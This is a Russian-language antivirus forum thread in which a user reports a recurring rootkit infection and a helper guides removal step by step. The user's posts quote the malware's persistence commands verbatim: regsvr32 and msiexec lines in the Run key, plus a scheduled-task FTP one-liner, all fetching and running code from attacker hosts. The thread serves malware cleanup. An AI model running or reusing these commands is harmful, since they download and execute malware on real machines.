Здравствуйте, у меня такая проблема. Недавно переустановил систему. Через 4 дня появилось сообщение о заражении такого содержания:
Объект http://47.88.216.68:8888/test.dat. Заражение Win32:Rootkit-gen [Rtk]. Процесс C:\Windows\System32\Isass.exe.
Решил так же проверить в реестре раздел Run. В нём появилось две, отсутствующих до этого записи -
Имя - Start. Тип - REG_SZ. Значение - regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll.
Имя - Start1. Тип - REG_SZ. Значение - msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q.
Кроме того в планировщике заданий появилась такая запись -
Файл - Mysa. Действие - Запуск программы. Подробности - /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe.
Систему ставил с форматированием жёсткого диска, и потому просто решил переустановить её ещё раз. Но на четвёртый день всё повторилось сначала.
Не подскажите что делать?
Rimazar, здравствуйте!
Подготовьте отчеты по инструкции: https://forum.avast.com/index.php?topic=130898.0 и прикрепите их в следующем сообщении.
Вот отчёты. Надеюсь всё правильно сделал.
P.S. Остался ещё файл MBR.dat, но его нельзя добавить во вложения. Не знаю, нужен ли он.
[*]Сохраните прикрепленный файл fixlist.txt на Рабочем столе
[*]Теперь, пожалуйста, запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
[*]Обратите внимание, что компьютер будет перезагружен.
ВНИМАНИЕ! Данный скрипт написан только для этого пользователя, использование его на другом компьютере может привести к неработоспособности ОС!
Andrey,pro, сделал всё, как вы написали. Прикрепляю лог.
Rimazar, проблемы по-прежнему наблюдаются?
Andrey,pro, сообщение о заражении продолжало появляться до 8 числа включительно. В последние дни его нет. Некоторые файлы Avast переносил в карантин (прикладываю изображение). Однако, поискав по интернету информацию о данном вирусе я нашёл его остатки. Первый - запись с нелицеприятным названием в wbemtest.exe (второе изображение). Если её удалить, хуже не будет? Второй остаток: если в консоли (cmd) ввести “net user”, то среди всех учётных записей видно IUSR_Servs. Как его удалить я не знаю.
P.S. Так же Mbam (ознакомительная премиум версия) иногда блокирует входящий трафик разных IP файлов svchost.exe и skype.exe. Но я не уверен, что это связано с вирусом.
Интересно, вирус использует WMI для заражения.
Скачайте, пожалуйста, WMI Explorer 2.0 по ссылке https://www.bleepingcomputer.com/download/wmi-explorer/
В нем, в ROOT\subscription найдите класс ActiveScriptEventConsumer, далее скопируйте скрипт, сохраните в блокноте и прикрепите в следующем сообщении. После этого данный класс можно удалить.
Вот блокнот со скриптом. В WMI Explorer он шёл сплошным текстом и я попробовал его разбить на строки для удобства прочтения.
P.S. Прошу прощения, если что сделал не так, с этой программой дело имею впервые.
Rimazar, все хорошо, удалите, если присутствует, файл c:\windows\debug\item.dat
После этого скачайте Dr.Web CureIt!: https://free.drweb.ru/cureit/ и проведите сканирование компьютера. Отчет о сканировании прикрепите в следующем сообщении.
Andrey,pro, файл item.dat удалил. CureIt! пишет, что заражений не обнаружено. Хотел прикрепить отчёт, но его размер превышает допустимый (файл весит 5,33 Мб).
Если угроз обнаружено не было, то, в принципе, отчет не нужен. Сейчас наблюдаются какие-то проблемы?
Andrey,pro, пока никаких следов вируса не видно. Avast тоже спокоен. Премного благодарен за умело оказанную помощь!
Если проблем больше нет, то необходимо удалить программы, использованные для очистки компьютера.
Для этого скачайте и запустите Delfix
https://dl.dropboxusercontent.com/u/73555776/delfix.JPG
Рекомендую оставить Malwarebytes Anti-Malware в качестве сканера по требованию и проводить проверку хотя бы раз в месяц.